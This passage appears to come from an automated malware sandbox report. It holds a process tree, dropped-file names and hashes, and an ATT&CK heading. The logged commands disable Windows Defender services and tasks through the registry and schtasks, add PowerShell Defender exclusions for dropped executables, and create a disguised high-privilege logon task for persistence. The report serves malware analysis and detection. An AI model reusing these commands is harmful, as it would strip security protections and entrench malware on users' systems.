                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2088
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        6⤵
                                                          PID:4480
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                          6⤵
                                                            PID:3788
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:904
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                            6⤵
                                                              PID:3152
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2716
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                              6⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:640
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                            5⤵
                                                              PID:3928
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                6⤵
                                                                  PID:3660
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4736
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                  6⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:232
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3496
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                  6⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1712
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:780
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  6⤵
                                                                    PID:1428
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                    6⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:552
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                  5⤵
                                                                    PID:444
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                      6⤵
                                                                        PID:228
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:704
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                        6⤵
                                                                          PID:892
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5080
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          6⤵
                                                                            PID:960
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:904
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3772
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3516
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3572
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            6⤵
                                                                              PID:2156
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry class
                                                                              PID:5100
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                            5⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2632
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              6⤵
                                                                                PID:4484
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Modifies registry class
                                                                                PID:4456
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4804
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Modifies registry class
                                                                                PID:540
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                              5⤵
                                                                                PID:4668
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                  6⤵
                                                                                  • Modifies Security services
                                                                                  PID:2380
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4416
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                  6⤵
                                                                                    PID:3272
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2340
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    6⤵
                                                                                      PID:4940
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                      6⤵
                                                                                      • Modifies Security services
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:672
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                    5⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:3788
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      6⤵
                                                                                        PID:3552
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                        6⤵
                                                                                        • Modifies Security services
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3232
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4612
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                        6⤵
                                                                                        • Modifies Security services
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:552
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3660
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                        6⤵
                                                                                        • Modifies security service
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5020
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 1284
                                                                                      5⤵
                                                                                      • Program crash
                                                                                      PID:4304
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\LoadNew.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\LoadNew.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4716
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\taskhost.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\taskhost.exe"
                                                                                    4⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    PID:2208
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\taskhost.exe'
                                                                                      5⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:2152
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        6⤵
                                                                                          PID:2088
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
                                                                                        5⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:3980
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\mobiletrans.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\mobiletrans.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4304
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\XClient.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\XClient.exe"
                                                                                      4⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      PID:612
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\XClient.exe'
                                                                                        5⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:5020
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                                        5⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:3460
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                                                                                        5⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:5008
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                                        5⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:2096
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\newfile.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\newfile.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:228
                                                                                • C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1168
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:2056
                                                                                • C:\Users\Admin\AppData\Local\Temp\DE2C.tmp.x.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\DE2C.tmp.x.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3728
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                  2⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:1752
                                                                                • C:\Windows\System32\schtasks.exe
                                                                                  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                  2⤵
                                                                                    PID:4720
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                    2⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:2392
                                                                                  • C:\Windows\System32\conhost.exe
                                                                                    C:\Windows\System32\conhost.exe
                                                                                    2⤵
                                                                                      PID:3144
                                                                                    • C:\Windows\System32\dwm.exe
                                                                                      C:\Windows\System32\dwm.exe
                                                                                      2⤵
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:2312
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                      2⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:5268
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                      2⤵
                                                                                        PID:5304
                                                                                    • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                      "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                      1⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5008
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3140 -ip 3140
                                                                                      1⤵
                                                                                        PID:4468
                                                                                      • C:\Windows\system32\LogonUI.exe
                                                                                        "LogonUI.exe" /flags:0x4 /state0:0xa3993055 /state1:0x41c64e6d
                                                                                        1⤵
                                                                                          PID:2568

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\4363463463464363463463463.exe

                                                                                          Filesize

                                                                                          10KB

                                                                                          MD5

                                                                                          2a94f3960c58c6e70826495f76d00b85

                                                                                          SHA1

                                                                                          e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

                                                                                          SHA256

                                                                                          2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

                                                                                          SHA512

                                                                                          fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\02.08.2022.exe

                                                                                          Filesize

                                                                                          208KB

                                                                                          MD5

                                                                                          0b7363dd5e63b991f081e62a094200d9

                                                                                          SHA1

                                                                                          081bb7b5fded50b57ce810d312a1b716cfb68780

                                                                                          SHA256

                                                                                          b33ad01d6425946e6272c363b08662383810fbd5ce5d641ff367f84f6bb821f0

                                                                                          SHA512

                                                                                          b3d43336017f33af358aea8dc1b1009d1641b6f12d5b12eec4b33c379908e9d662a158fd3eac4ff46789297c397a3db4c75d64e09ff6f21eaa6f62379d3a320c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\AmLzNi.exe

                                                                                          Filesize

                                                                                          1.0MB

                                                                                          MD5

                                                                                          73507ed37d9fa2b2468f2a7077d6c682

                                                                                          SHA1

                                                                                          f4704970cedac462951aaf7cd11060885764fe21

                                                                                          SHA256

                                                                                          c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

                                                                                          SHA512

                                                                                          3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Armanivenntii_crypted_EASY.exe

                                                                                          Filesize

                                                                                          626KB

                                                                                          MD5

                                                                                          795197155ca03f53eed7d90a2613d2a7

                                                                                          SHA1

                                                                                          e177b0c729b18f21473df6decd20076a536e4e05

                                                                                          SHA256

                                                                                          9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf

                                                                                          SHA512

                                                                                          4aff1b1d26b5d3389d8deb0b9b428f4e81daa9d530e37cb3064d33c243407dbf73a218367ba4fa2138b068fc40b5588d5d4ae4849a921ea5e407ad4d3610084b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Authenticator.exe

                                                                                          Filesize

                                                                                          11.0MB

                                                                                          MD5

                                                                                          dae181fa127103fdc4ee4bf67117ecfb

                                                                                          SHA1

                                                                                          02ce95a71cadd1fd45351690dc5e852bec553f85

                                                                                          SHA256

                                                                                          f18afd984df441d642187620e435e8b227c0e31d407f82a67c6c8b36f94bd980

                                                                                          SHA512

                                                                                          d2abe0aec817cede08c406b65b3d6f2c6930599ead28ea828c29d246e971165e3af655a10724ca3c537e70fe5c248cdc01567ed5a0922b183a9531b126368e3f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe

                                                                                          Filesize

                                                                                          7.2MB

                                                                                          MD5

                                                                                          f4c69c9929cba50127916138658c1807

                                                                                          SHA1

                                                                                          b1b760ebd7eaa70b038fa6f159ac5aa1ce8030fa

                                                                                          SHA256

                                                                                          939ca243bd3a5bcdd5d617365b5331ed9c3d7861ab212bf8576a02de2d941d62

                                                                                          SHA512

                                                                                          da0436a5db456cd692cc378f911fc3c523fcc32b9e7e61b272b17a957d404c90d5d0830831975d817cf7fe69c3fb65f59a2a17d12e6f9215d4bf7fb65798b36a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Java32.exe

                                                                                          Filesize

                                                                                          3.3MB

                                                                                          MD5

                                                                                          bc884c0edbc8df559985b42fdd2fc985

                                                                                          SHA1

                                                                                          9611a03c424e0285ab1a8ea9683918ce7b5909ab

                                                                                          SHA256

                                                                                          e848b330ee5a8bd5ae1f6b991551e30a4a5b2e5deeb4718a15b2122101f2c270

                                                                                          SHA512

                                                                                          1b8c97d500de45fbf994dcd9bf65cc78106a62ff0770a362add18866cceebbe9f5e157a77d26cb0d0d8de89abe3d446bc911f33e7027fa8f8809d2720b0cedcc

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\LoadNew.exe

                                                                                          Filesize

                                                                                          2.5MB

                                                                                          MD5

                                                                                          414753e6caa05ca4a49546cec841ef10

                                                                                          SHA1

                                                                                          998c0b4533f3e00eeacf441fbe29575198a574d4

                                                                                          SHA256

                                                                                          5b9ed73fd7af6b0f9625ff30b925c84905e76b694a37e41d6207626b2fc3d2f6

                                                                                          SHA512

                                                                                          c6f1476229c6587d7209455cbba42f1eb44b72b14842a60b446ab8252330c3f47d332f95645136493dfe07f8f00e4064bf6f789149e9dec0807024f5effdf4a7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Server.exe

                                                                                          Filesize

                                                                                          23KB

                                                                                          MD5

                                                                                          a7a2022d715b3ecb85ea55de936f011b

                                                                                          SHA1

                                                                                          0200512447f2e95d1675b1833d008ea4a7ddaa94

                                                                                          SHA256

                                                                                          d5eaaa22cd69c6ddf1da7b0c8bd0cabbcda679810ed2d95839c08244235fbf81

                                                                                          SHA512

                                                                                          7a0910ef562cb5936ab94fa94dce05eec2d6add7d6c3be3e8ad79a9710bc4fc283aec2d2f20dc6d4b0d641df5a8b1e368e6438f8e04c8f24a61b262d60ce5901

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Setup.exe

                                                                                          Filesize

                                                                                          279KB

                                                                                          MD5

                                                                                          d0cce7870080bd889dba1f4cfd2b3b26

                                                                                          SHA1

                                                                                          a973389aa0908d7b56115aff9cd4878fbd9381f9

                                                                                          SHA256

                                                                                          8ff3039072ecb32c50f446d6857aceef55547486f0572fe70feb5b1fa4c4727a

                                                                                          SHA512

                                                                                          5fde0ed0ad44569d290972f336d0ca29c38f49bacefe7ba974cbb17d6db7a1a57a8e4f8618f438820c2ff386a6b9c5b8b702c24ee8718cae51379d1566729548

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\TigerHulk3.exe

                                                                                          Filesize

                                                                                          3.3MB

                                                                                          MD5

                                                                                          2ac74d8748c9671b6be2bbbef5161e64

                                                                                          SHA1

                                                                                          9eda3c4895874c51debb63efe0b00247d7a26578

                                                                                          SHA256

                                                                                          cc5edd7e3d2b641070e903361869ccd5eb9e5f74dda16dc8696f63a777fbed19

                                                                                          SHA512

                                                                                          02be9a90c786e7e2065b14f75d51ae39026aff0e7603f6c98614fd0edc9ee8a6cbbe2f6a0115663e9f2fb3a7caa657a4d36d8645f211bcfe144aa667df2b5774

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\XClient.exe

                                                                                          Filesize

                                                                                          64KB

                                                                                          MD5

                                                                                          713ca1f8ec4074b3ee385feded17e9cc

                                                                                          SHA1

                                                                                          bb3baa5440fbf87d097b27c60c7a95d53c85af02

                                                                                          SHA256

                                                                                          2a3514578e78c6d33ec89ed24f693c84804f0f10545779cd11626eedb7bdfc14

                                                                                          SHA512

                                                                                          8d16ade6aca158fad703bc9b1dd16af201efe629e39b5f86bbfdd524854a4783f1333c7e1820750d71ef299aef067ea01af4f0e0dbbadb15f657504845154557

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ardara.exe

                                                                                          Filesize

                                                                                          3.1MB

                                                                                          MD5

                                                                                          30c6bf614292827bf72ab2a53dde9def

                                                                                          SHA1

                                                                                          057a43f119a380a846ee0df36e98bc848970e510

                                                                                          SHA256

                                                                                          f97b93920a4f3672e59a353cb83158a7fb1130e08939650370ef71d77b3959ae

                                                                                          SHA512

                                                                                          8a88cd53ff5fc39bb9a95912e5fc80c6be7b6c77d79599609edfc64ae67149ebef19a1674f77eba4369744290c392286fabb69f05a303e565a39455405175a4e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ev.exe

                                                                                          Filesize

                                                                                          16KB

                                                                                          MD5

                                                                                          56c16aff11b467b005d11b493defbe4c

                                                                                          SHA1

                                                                                          ab7b8c80eeee91de84c1c3c3886fb18a826f1bad

                                                                                          SHA256

                                                                                          622bda80fb2ea6f132ff3efe37bae181b4acd0f182ae116682dcb9e6348cc26a

                                                                                          SHA512

